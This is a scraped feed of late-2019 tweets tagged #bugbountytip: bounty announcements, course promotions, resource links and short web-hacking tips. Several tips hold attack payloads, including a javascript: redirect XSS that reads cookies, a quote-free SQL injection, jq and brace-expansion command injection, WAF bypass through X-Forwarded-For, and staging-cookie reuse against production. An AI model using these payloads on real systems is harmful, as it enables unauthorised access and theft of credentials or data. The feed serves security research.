5 Facebook Bug Bounty Resources by Philippe Harewood https://t.co/bpGdyUXc98 #Facebook #FB #BugBounty #bugbountytip #bugbountytips #EthicalHacking #EthicalHacker #Hacking #Hacker #Hackers #WhiteHat #WhiteHatHackers #AppSec #InfoSec #ITSecurity #CyberSecurity #Pentesting #Pentest https://t.co/hXoBqe1G5V
Avanish Pathak
@avanish46


2019-12-17 03:18:52
3 I earned $750 on @Bugcrowd . Capture the Account Creation Request On BurpSuite, Most of the case you'll find the redirect request in burp but not on the web : - [ https.//www.TARGET.com/account-created?redirectUrl=javascript:alert(document.cookie)// ] #bugbounty #bugbountytip https://t.co/Mxy2TieMIh
Ammar Amer🇸🇾
@cry__pto


2019-12-17 00:38:05
7 113 #OSINT TIPS created by me and the number of tips will get higher every day until it reach 1000 tips. New Updates. https://t.co/gNMSDGULS6 #Hacking #PenTest #bugbountytips #redteam #CyberSecurity #infosec #bugbountytip
Tirtha Mandal
@tirtha_mandal


2019-12-16 23:01:04
1 First time I successfully reproduced HTTP Dsync attack on a bug bounty program. Thank you @synack @SynackRedTeam 🤩😍 #synack #srt #redteam #bugbountytip #httpdsync https://t.co/zlPjFgXbHS
Ben Tai
@ben_tby


2019-12-16 21:07:28
4 Just a few days before I was simultaneously celebrating my first and second reward, and today I'm proudly celebrating my third reward. Thank you, @Hacker0x01 #BugBounty #bugbountytip #Hacking https://t.co/CcftdtdQya https://t.co/aADPguvhzk
bugbountytip
@a_l_e_r_t_1_


2019-12-16 18:05:36
0 https://t.co/pjFDcvvJCX I'm a newbie on bug bounty. When I'm working I'm streaming on Twitch. Please check my channel and follow me 😂. #bugbountytip #bugbounytips
Simpliv
@simplivllc


2019-12-16 16:00:07
1 This Self-paced Course Teaches You In Detail About [Ethical Hacking] Click Here To Sign Up #Hacking #Cybersecurity #bugbountytip #networking @StartGrowthHack @cry__pto @Pavandep8 @simplivllc https://t.co/6Q7g0olioK https://t.co/qEolSxBN7w
bug bounty tips - Retweet
@BugbountytipsR


2019-12-16 15:23:05
0 SQLi Without Quotes One of the BEST and SIMPLE BYPA$$ by @rodoassis username = \ password = INPUT2 SELECT * FROM login WHERE username = '{\' AND password = }'$INPUT2'; Part inside { } is considered as string https://t.co/mVDuuArf5Z #bugbountytips #bugbountytip
ghostlulz
@ghostlulz1337


2019-12-16 14:51:19
0 If you are serious about making a living doing bug bounties or working as a penetration tester you may want to get a copy of my latest book. 💰HUGE KNOWLEDGE DROP 💰 https://t.co/zJFRZjg5q2 #BugBounty #bugbountytip #bugbountytips #osint #infosec #redteam #hacking #pentest https://t.co/8tbkOCbFgM
Evgeny Larin
@godexmachine


2019-12-16 13:15:39
0 You can identify the Laravel framework by laravel_session cookie, then make a potential illegal request like POST, PUT, etc to check if debug mode is enabled. #BugBountyTip #BugBounty
TomNomNom
@TomNomNom


2019-12-16 11:00:27
9 If you need an element other than <a> for DOM Clobbering (i.e. one that returns an attribute value instead of '[Object HTMLElement]' when you call .toString() on it), you can use <area> with an href attribute #bugBountyTip https://t.co/YCSMhhPK61
noobSecurity
@noobsec_org


2019-12-16 07:17:12
6 https://t.co/7phSLNkWWL How we get $4000 in 5 minutes (Indonesian Language) #bugbounty #bugbountytip #bugbountytips #ittakesacrowd #togetherwehitharder
Laxmikant Bhumkar
@LuckyBhumkar


2019-12-16 00:09:51
0 Step by Step Bug Bounty by Nishant Saurav #bugbountytip https://t.co/0qTUn8I7Br
Elsadat ✪
@M0_SADAT


2019-12-15 00:38:20
3 I have submitted P1&P2 bugs more than 20 days and still no fix!! @santi_lopezz99 #bugbountytip PAY ME THEN DO THE DAMMN FIX! #bugbountylife #bugbounty #hacking #infosec
Max
@0xw2w


2019-12-14 23:01:10
2 @Hacker0x01 my.anotherdomain\@anotherdomain.com - 500 error my.anotherdomain^@anotherdomain.com - 302, accepted If you see that there are errors & your redirect does not occur but there are hints that this could work in particular cases, don't give up and continue to fuzz! #bugbountytip #bugbounty
TheDelfX
@TheDelfX


2019-12-14 17:12:19
0 We are hackers. #hack #BugBounty #bugbountytip #software #hacking #hacker #hackerone https://t.co/29Q6mV643B
ghostlulz
@ghostlulz1337


2019-12-14 16:00:33
7 If you are serious about making a living doing bug bounties or working as a penetration tester you may want to get a copy of my latest book. 💰HUGE KNOWLEDGE DROP 💰 https://t.co/zJFRZjg5q2 #BugBounty #bugbountytip #bugbountytips #osint #infosec #redteam #hacking #pentest https://t.co/1TiV1v7Ipm
Nm Kannan 🇮🇳
@cybrsadist


2019-12-14 14:28:33
2 Useful video for n00b bug hunters => https://t.co/KbiKnOA4mg by @InsiderPhD #bugbountytip #bugbounty #infosec #penetrationtesting
bug bounty tips - Retweet
@BugbountytipsR


2019-12-14 14:09:20
0 Gr8 Blind SQLi tips BUGH/*$$$$*/UNTER - Insert comment b/w string, if respond remain same then it is sqli Profile @gerben_javado WriteuP https://t.co/65svYcig2u Wonder Why @gerben_javado is not writing more blogs? #bugbountytip #bugbountytips
Sudoka
@sudo_sudoka


2019-12-14 08:05:24
1 Tableau Server #unauthenticated XSS, CVE-2019-19719, just visit: http://example[.]com/en/embeddedAuthRedirect.html?auth=javascript:alert("XSS") It's also an Open Redirect. #ThreatIntel #infosec #bugbounty #bugbountytip Let's search on Shodan: https://t.co/c4zhLFo9KK

@pouyana1


2019-12-14 06:53:55
0 sometimes you can rely on 'Last-Modified' header to recognize software version, useful for finding available public exploits. #bugbountytips #bugbounty #bugbountytip
Shantanu Kulkarni
@shantanukul_


2019-12-14 06:35:01
7 6k hackerone disclosed reports at one place. https://t.co/3Dod4cwLHj #hacking #pentesting #bugbounty #recon #pentest #infosec #cybersecurity #itsecurity #websecurity #appsec #hacker #security #Hackers #Android #Androidhacking #bugbountytips #bugbountytip #hackerone #bugcrowd

@pouyana1


2019-12-13 18:17:29
1 Use x-forwarded-for to bypass WAF ip based limitations. #bugbountytip #bugbounty #bugbountytips
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-13 04:06:34
0 Cross Site Request Forgery: Techniques https://t.co/3N7hAtbbFP #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #ceh #eccouncil #certification #training #cybersecuritytraining
Selim Enes Karaduman
@Enesdex


2019-12-12 18:55:51
0 Always check for location.hash and location.href; if these JS codes are going into any sink without encoding, it's DOM XSS. E.g. var hash = location.href .....innerHTML = hash #bugbountytip #bugbountytips #BugBounty
Pflash Punk
@PflashPunk


2019-12-12 18:48:25
0 I just published SSRF via FFmpeg HLS processing https://t.co/NISu4rr8Ik #bugbounty #bugbountytips #bugbountytip
Halil AHMAD
@Halilahmadd


2019-12-12 18:06:10
0 After a nice stored xss I prepared my report.I hope everything will be fine. #BugBounty #BugBountyTip #Hackerone @Hacker0x01 @GoogleVRP https://t.co/gEmljQEZd9
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍 台風
@spyerror


2019-12-12 17:47:49
0 @Aksam funny, i think you are sleeping 😴 #BugBounty #BugBountyTip #WAF #infosec https://t.co/kExJ2STUK2
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-12 17:17:17
0 When the screens went black: How NotPetya taught Maersk to rely on resilience – not luck – to mitigate future cyber-attacks https://t.co/ECnt63vXqE #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #ceh #eccouncil
YogoshaOfficial
@YogoshaOfficial


2019-12-12 14:15:14
3 [#bugbountytip] Found staging application that gives you access to a privileged account with default credz, make sure to reuse this domain's cookies on the main domain (prod), you can easily access as privileged user. @TnMch_ & Get ready for #yogoshachristmaschallenge next monday !
bug bounty tips - Retweet
@BugbountytipsR


2019-12-12 13:56:24
0 TIP: IF you DON'T like the RESPONSE of SERVER INTERCEPT RESPONSE CHANGE IT use BURP Changed Response to Bypass Authentication by John Simon Profile https://t.co/m6mB5kZ7lh WriteuP https://t.co/K1SbMWjDfq #bugbountytip #bugbountytips #writeup #hacking
Zero Xyele
@zeroxyele


2019-12-12 11:59:11
0 I released new tool for extracting api keys and secrets. https://t.co/YqD2Cac6iy #bugbounty #bugbountytip #bugbountytips #hackerone #hacker101 #bugcrowd https://t.co/jzAuhGY7b8
Sunil
@Sunilkande1137


2019-12-12 06:16:33
1 Recon Resources https://t.co/W7NLDe4PNJ https://t.co/xj3JvFgojf https://t.co/Gx4sx1ZoPM https://t.co/gFAXmz3t34 #hacking #pentesting #bugbounty #recon #pentest #infosec #cybersecurity #ITsecurity #websecurity #appsec #hacker #security #Hackers #bugbountytips #bugbountytip
Mashoud1122
@mashoud1122


2019-12-12 04:17:01
1 Command exec in JQ cat file.json | jq .[;whoami;] returns error with command executed. #bugbountytip #bugbountytips #BugBounty #infosec #Security
Sunil
@Sunilkande1137


2019-12-12 01:25:04
4 6000 hackerone disclosed reports at one place. https://t.co/bxvXpnVitp #hacking #pentesting #bugbounty #recon #pentest #infosec #cybersecurity #itsecurity #websecurity #appsec #hacker #security #Hackers #Android #Androidhacking #bugbountytips #bugbountytip #hackerone
Vishnu Vardhan Gadupudi
@vishu10x00


2019-12-11 20:11:29
0 @idontkn85445458 @Dondata4 - As this is a post based you need to create a html csrf to trigger xss. - Just use burpsuite CSRF generator. - Save it as .html file. - Open the .html file it triggers XSS🎉️ #bugbountytip
Sunil
@Sunilkande1137


2019-12-11 19:13:07
3 6000 hackerone disclosed reports at one place. https://t.co/bxvXpnVitp #hacking #pentesting #bugbounty #recon #pentest #infosec #cybersecurity #itsecurity #websecurity #appsec #hacker #security #Hackers #Android #Androidhacking #bugbountytips #bugbountytip #hackerone
bug bounty tips - Retweet
@BugbountytipsR


2019-12-11 14:18:36
0 Use this link https://t.co/MWpV7kbFdO #bugbountytip #bugbountytips https://t.co/2suoUC9DK3
Tragger Osbourne🧐
@OsbourneTragger


2019-12-11 13:52:31
0 We all know @bishopfox is a team full of slayers. Be sure to check out their latest write up where they identified 9 vulnerabilities in the Solishmed app #bugbounty #bugbountytip #bugbountytips #infosec #redteam #osint https://t.co/sNVecQJVRj
Vishnu Vardhan Gadupudi
@vishu10x00


2019-12-11 13:39:36
0 Escalate CRLF to RCE, I got this chain in my dreams⛷️, i think it won't, at least not very often :P #bugbountytip CRLF -> X-HTTP-Method-overide:PUT -> Shell
bug bounty tips - Retweet
@BugbountytipsR


2019-12-11 12:56:47
1 XSS is like evil God who is everywhere Xss Hunter @AnasIsHere Xss Like Pro at https://t.co/a47iwf9j9f #bugbountytips #bugbounty #bugbountytip #hacking #writeup #xss
ghostlulz
@ghostlulz1337


2019-12-11 12:46:24
3 Everyone knows @bishopfox is a team full of slayers. Be sure to check out their latest write up where they identified 9 vulnerabilities in the Solishmed application. https://t.co/OtxduAPoSM #bugbounty #bugbountytip #bugbountytips #infosec #redteam #osint
D Ξ Ξ P Λ K ⚙️
@Deepak_maxx


2019-12-11 12:43:40
0 If you got 10 stored XSS on the same application! How would you report it and why? I'm sure everyone will have their own opinions & experiences regarding this! #bugbounty #bugbountytips #bugbountytip
ZracheSs-AnasZ
@ZrariAnas


2019-12-11 08:12:03
0 If you didn’t already subscribe to @spaceraccoonsec blog posts! Go now, do it.. Come on, don’t question reason, just do it. Trust me, you’ll like it. I love you and you love me, then go do it. Subscribe, it’s free... No reason not to. Stop reading already!!??? #bugbountytip https://t.co/A7MeCBTLaA https://t.co/IGbatoBAAM
bug bounty tips - Retweet
@BugbountytipsR


2019-12-11 03:59:08
0 Beginners miss to chk source code for XSS and they never find out that it is easy #easy #bugbountytip #bugbountytips #hacking https://t.co/QM6gs3Ijpi
Sajjad Arshad
@sajjadium


2019-12-11 03:34:14
0 @USENIXSecurity @fransrosen @dawidczagan @orange_8361 @irsdl @garethheyes @NahamSec @ldionmarcil @nj_dav @jobertabma check out new ways of exploiting #WebCacheDeception using #PathConfusion techniques! #togetherwehitharder #bugbounty #bugbountytip #bugbountytips @Hacker0x01 @TheHackersNews
Ammar Amer🇸🇾
@cry__pto


2019-12-10 17:34:59
5 -List of some Penetration Testing Tools.pdf: https://t.co/sN2lkjt1Uh -In Plain Sight:1: Vulnhub Walkthrough.pdf: https://t.co/F2zf4eJK6n -A cheat-sheet for password crackers.pdf https://t.co/XQQxCJ99wQ #bugbountytip #redteam #PenTest #Hacking #cybersecurity #BugBounty #OSINT
Mourad
@SecuAudit


2019-12-10 15:56:36
0 I reported a critical bug in a 3rd party website, company confirmed that this is critical even if it is out of scope, HackerOne Staff despite this insists that this is not critical and updated the severity from Critical to Medium #750138 #BugBounty #bugbountytip @Hacker0x01 😟
0day work
@0daywork


2019-12-10 15:53:28
1 #Bugbountytip Look for #API keys in the documentation or screenshots of blog posts. Sometimes those are *not* (entirely) redacted and still valid employee's credentials, giving you access to some juicy endpoints ;-) #Bugbounty #OWASP #ITSecurity https://t.co/V91tslWu3Y
Skyper 💻
@SkypLabs


2019-12-10 00:33:05
2 Get the #ASN of a company: https://t.co/pi8II54BuN #Security #Hacking #BugBounty #BugBountyTip #BugBountyTips #Shodan
Alessandro Brucato
@_brucedh


2019-12-09 17:17:36
0 Any idea how to trigger an XSS into the body of a 301 redirect? @s0md3v @uraniumhacker @iamnoooob @brutelogic #bugbountytip https://t.co/dmW1q4hwTv
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-09 16:21:04
4 🏆🏆Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/4iR3cX3qyf
intigriti
@intigriti


2019-12-09 13:08:32
12 Did you know you can use OpenSSL for recon purposes? 🔒😏 Thanks for the #BugBountyTip, @michael1026h1! https://t.co/mRraH8cK2z
Mohammed Shine
@MohammedShine8


2019-12-09 11:44:16
6 Got stuck with spaces in command Injection? Use {} to eliminate spaces while using commands. Eg: {ping,127.0.0.1} {ip,addr} {ls,-al} #bugbounty #bugbountytip #infosec #commandinjection #cmdi #vapt #hacker
dark_warlord14
@dark_warlord14


2019-12-09 11:42:17
1 Opened a web page on Firefox and left to get coffee. Came back in a minute to find that sweet XSS popup by @knoxss_me just lying there. @brutelogic will amaze you every time. #bugbountytip Try @knoxss_me and save time looking for XSS manually. https://t.co/4ppKTLDCeN
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-09 08:47:33
0 💰Keep Following Us 💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #ceh #eccouncil #certification #hackerone https://t.co/DwvuqYv30k
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-09 08:43:54
0 True Story When Hacking the Neighbourhood WiFi — Tutorial Coming Soon 💰💰 Keep Following Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops https://t.co/P5VyKxUU81
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-09 08:41:28
0 HOF Coming Soon ! Keep Following ! Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #ceh #eccouncil https://t.co/3GBqgjOgP4
robre
@_robre


2019-12-09 00:43:25
0 Create your own wordlists and be creative with them. If you’re just using seclists like everyone else, you will only find what everyone else is finding. #bugbountytip #bugbountytips
Rafin Rahman Chy
@rafinrahmanchy


2019-12-08 18:15:45
3 Information Gathering Methodologies *Social Engineering *Doxing *OSINT *Advanced Google Search/Google Hacking *DNS Enumeration *Internet Archive *Dumpster Diving #CyberSecurity #InfoSec #EthicalHacking #EthicalHacker #Hacking #Hacker #Pentesting #Recon #BugBounty #bugbountytip https://t.co/bVcvwskY8a
Tragger Osbourne
@OsbourneTragger


2019-12-08 15:06:59
0 Firebase database: it’s one of the easier wins for #BugBoundy. You can easily look for it on Google using Site:.firebaseio.com/.json, but Google doesn’t give you results; if you use Bing you can get results. Google knows the problem #togetherwehitharder #BugBounty #bugbountytip https://t.co/fMSc8J6lM1
Rafin Rahman Chy
@rafinrahmanchy


2019-12-08 15:01:12
11 The best guideline to become an Ethical Hacker I've ever read https://t.co/BMrOc4hH51 #CyberSecurity #InfoSec #infosecjobs #InfoSecurity #ITSecurity #EthicalHacking #EthicalHacker #Hacking #Hacker #Hackers #WhiteHat #BugBounty #bugbountytip #bugbountytips #Pentesting #Pentester
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-08 10:21:34
0 Ginp - A malware patchwork borrowing from Anubis Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting https://t.co/AzgReUIeLf
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-08 10:15:48
0 Breaking Mimblewimble’s Privacy Model Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops https://t.co/5gDbIPnmFH
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-08 10:07:55
2 Free Giveaway -- Free Programming Ebooks Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops https://t.co/7kp48r2kcA
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-08 10:00:40
3 Introducing Flan Scan: Cloudflare’s Lightweight Network Vulnerability Scanner -- Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 https://t.co/OSiQlEhTHi #BugBounty #BugBountyTip #bugbountytips
Terminal Jockey
@TerminalJockey


2019-12-08 04:03:53
1 I wrote a tool to help me learn bash! Simple script to do a little dns enum then crawls results for dirs found in the robots.txt file. Will be adding functionality, open to critique! https://t.co/PmlCbFedDE #bugbounty #infosec #ctf #bugbountytips #bugbountytip
Ammar Amer🇸🇾
@cry__pto


2019-12-07 23:54:02
2 I have finished building my GitHub repository which talks about #OSINT. A very important repository for ethical hackers and #BugBounty hunters and of course #OSINT lovers. The repository for now contains 100 tips and it will get daily updates https://t.co/gNMSDGULS6 #bugbountytip
Samet ŞAHİN
@sametsahinnet


2019-12-07 18:14:21
2 Here is a blog and trick about : "Javascript File Inclusion via a Simple Link Injection" #bugbountytip : Even a Simple Link Injection can be very harmful. Depends on where it is. https://t.co/TcOpslYuvE https://t.co/ks5NJDD3ss
Zero Xyele
@zeroxyele


2019-12-07 12:28:31
0 I Got URLs https://t.co/K5qmVWfEs0 #hackerone #hacker101 #bugbounty #bugbountytips #bugbountytip #bugcrowd https://t.co/X7J2nk2dyz
xaeroborg
@xaeroborg


2019-12-07 12:09:05
0 resource #bugbountytips #bugbountytip https://t.co/kSxeWPYqWe
Hendrik
@hendrikvb


2019-12-07 07:11:49
0 #bugbountytip Add #corsy to your #CSRF recon, complement with #bolt, both by @s0md3v. #bugbounty #Pentesting
ghostlulz
@ghostlulz1337


2019-12-07 01:52:08
1 Most hunters freeze up when they get a piece of source code to analyze. Source code analysis can help you find a lot of bugs which are missed by black box style testing. Don't miss easy XSS. More info in my blog: https://t.co/Ke274Lvc9e #BugBounty #bugbountytips #bugbountytip https://t.co/E1XFw9H9Nc
ghostlulz
@ghostlulz1337


2019-12-06 20:40:05
10 If you're looking to make money bug bounty hunting you may want to get a copy of my book. Nothing is better than getting paid to do what you love! https://t.co/Z1FwTfiskG #BugBounty #bugbountytips #bugbountytip #infosec #appsec #osint #xss #pentest #redteam #cybersecurity https://t.co/CSTWdrUaD2
CyberTheReapeR☢
@CyberTheReapeR5


2019-12-06 20:39:18
1 what is xss payload for akamai waf bypass?? #hackerone #bugcrowd #infosec #bugbountytips #bugbountytip #xss #hacking
dos_kid
@kid_dos


2019-12-06 18:12:15
0 #bugbountytip Look twice before submitting reports especially for Information disclosures 😓
bugbountytip
@a_l_e_r_t_1_


2019-12-06 09:12:09
1 (Just a little bit earning for my master degree).. Learn & Hack & Earn https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby https://t.co/amLbKREucw
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-06 06:03:58
6 Type of Cyber Attacks 🦞 Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/MZpyBpq6C4
Ammar Amer🇸🇾
@cry__pto


2019-12-06 03:06:03
6 -Windows Notes + Cheatsheet.pdf: https://t.co/lVxi7uImty -Windows Privilege Escalation Fundamentals.pdf: https://t.co/raueoqhVVH -Linux Notes + Cheatsheet.pdf: https://t.co/rrdCBWkbOT -Docker for Pentesters.pdf: https://t.co/Wl6qXHe6XI #bugbountytip #redteam #PenTest #Hacking
bayani elogada
@metamudkip


2019-12-06 02:14:16
0 If you're discouraged from joining unrewarding bug bounty programs, listen to @JessieJ: "We're paying with love tonight." #bugbounty #bugbountytip
fadetoblack
@hardweired


2019-12-05 19:59:55
0 If you're testing for SSRF or blind XXE and it should take time to be executed, or invalidated redirections to steal tokens: https://t.co/uHMg4rJD69 This tool is awesome to test for those kinds of bugs #bugbountytips #bugbountytip https://t.co/efC5pv0SZ4
Vishnu Vardhan Gadupudi
@VishnuGadupudi


2019-12-05 18:43:44
0 Is there anything more beautiful than this in bug bounty #bugbounty #bugbountytip thanks @h1_sp1d3r @hakluke @stokfredrik @Rhynorater https://t.co/z6iavoWzgc
გოჩა ოქრაძე (Gocha Okradze)
@GochaOqradze


2019-12-05 16:25:09
1 #bugbountytip Detect Unix Command injection Payloads: https://t.co/Jz35dKi8KS Detect in response: regexp for burp suite. https://t.co/J0bS7ViC9C And 30 second delay. It is all.
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-05 14:17:45
0 OnePlus #Breached Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/VVsLLbfvum
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-05 14:14:39
1 Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/yJGb5KrEnU
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-05 14:14:21
0 Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/mzFcIOkL8E
Rafin Rahman Chy
@rafinrahmanchy


2019-12-05 13:24:00
1 Facebook Bug Bounty Blogs/WriteUps : https://t.co/CKdsEXouCz https://t.co/rzoYk67VS6 https://t.co/xeQiLCoQbM https://t.co/7y70R706W1 https://t.co/E96wwBPfc6 https://t.co/hfAsZqb9tI https://t.co/ZxPANapI5l https://t.co/SJGiC0xChE https://t.co/d57e8Seq9m #BugBounty #bugbountytip https://t.co/L02NnprDQB
Anas Mahmood 🇵🇰
@AnasIsHere


2019-12-05 12:28:29
6 #XSS like a Pro 😎 Just published another interesting writeup. Must read the full blog post Writeup: https://t.co/HlXk9esUv3 #BugBounty #BugBountyTip #Hacking #vulnerability
TvM
@tvmpt


2019-12-05 12:12:22
0 Quick and dirty way to import a big url list into burpsuite cat file | parallel -j 200 curl -L -o /dev/null {} -x 127.0.0.1:8080 -k -s #quickanddirtytip #bugbountytip #oneliner #bugbountytips
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-05 09:14:20
7 Cross Site Scripting Basics - #XSS https://t.co/0wdvBhdOHw Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-05 09:06:33
0 >> kali-undercover To Start #UNDERCOVER Mode in Kali 2019.4 Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity https://t.co/F5IhdmmCzF
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-05 09:04:28
0 Update Your Kali and Get the Kali Undercover mode that looks like Windows OS ! Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops https://t.co/o7JrVLrhGx
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-05 09:01:35
0 PyXie Rat - Python Rat to Escalate Windows Permissions Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity https://t.co/eFwqj2ozDj
bugbountytip
@a_l_e_r_t_1_


2019-12-05 08:29:09
0 6 download for 50 + . GOOD HACKING !!! #bugbountytips #bugbountytip
Ajay Gautam
@evilboyajay


2019-12-05 07:06:04
4 I discovered a new kind of web application authentication bypass by accident while doing pentest and thought of sharing with you all <3 #infosecmatters #ethicalhacking #informationsecurity #cybersecurity #infosec #bugbountytip https://t.co/cFnTkaEFG2
ph0rensic
@ph0rensic


2019-12-05 01:15:20
0 I received $ 900 in a private program Hackerone! There is still time to hit the goal! I needed some arguments with the evaluator, always research what you're debating! https://t.co/TDQWkEfNMq #BugBounty #bugbountytip
გოჩა ოქრაძე (Gocha Okradze)
@GochaOqradze


2019-12-05 00:30:46
0 #bugbountytip 99.99% of xss on public programs is duplicates I got it
robre
@_robre


2019-12-04 21:06:25
1 @NathOnSecurity Hey little tip: open two windows of acunetix, double your income. #bugbountytip
@cr33pb0y
@theyiyibest


2019-12-04 20:05:09
0 Yay, I was awarded a 4 x $X00 bounty on @Hacker0x01! https://t.co/7vrkzfnbNA #TogetherWeHitHarder Recipe to this one: - Google Dorks - XSS reflected - Repeat first step. #bugbounty #bugbountyprogram #bugbountytip
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-04 18:58:36
0 Maximise Bug Bounty Scope - Gather Subdomains using Facebook Certificate Transparency https://t.co/AjSRBqt57p #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #ceh #eccouncil #certification #hackerone
intigriti
@intigriti


2019-12-04 15:47:09
9 ⚠️Open staging environments can lead to production account takeover ✔️If they use a separate DB, but same JWT secret ✔️If the username or e-mail address is used as identifier This is an excellent #BugBountyTip, thanks @kapytein! https://t.co/yZkBoDBO1d
Tragger Osbourne
@OsbourneTragger


2019-12-04 15:24:58
0 apps, I realized after reverse engineering, using a tool like apktool, I was able to look at the AndroidManifest, see all permissions, which often lead to stringxml where I would find content delivery, login ID & pass, FB tokens, googleapi, #bugbountytips #bugbountytip #togetherwehitharder https://t.co/ZBq3acOAoI
გოჩა ოქრაძე (Gocha Okradze)
@GochaOqradze


2019-12-04 12:19:07
1 #bugbountytip All in one for Bug Bounty Hunters and pentesters https://t.co/lRPVHMHKAo
Ammar Amer🇸🇾
@cry__pto


2019-12-04 00:37:38
3 -Pen-testing resources.pdf: https://t.co/eykvQfDT5g -Shellcode: Encrypting traffic.pdf: https://t.co/QMsNonNYPZ -huge list of pentest tookit.pdf: https://t.co/LM0XUQb2AI -Information Gathering with theHarvester.pdf: https://t.co/ZFWOVqotm6 #bugbountytip #Hacking #osint #redteam
Tragger Osbourne
@OsbourneTragger


2019-12-03 22:31:18
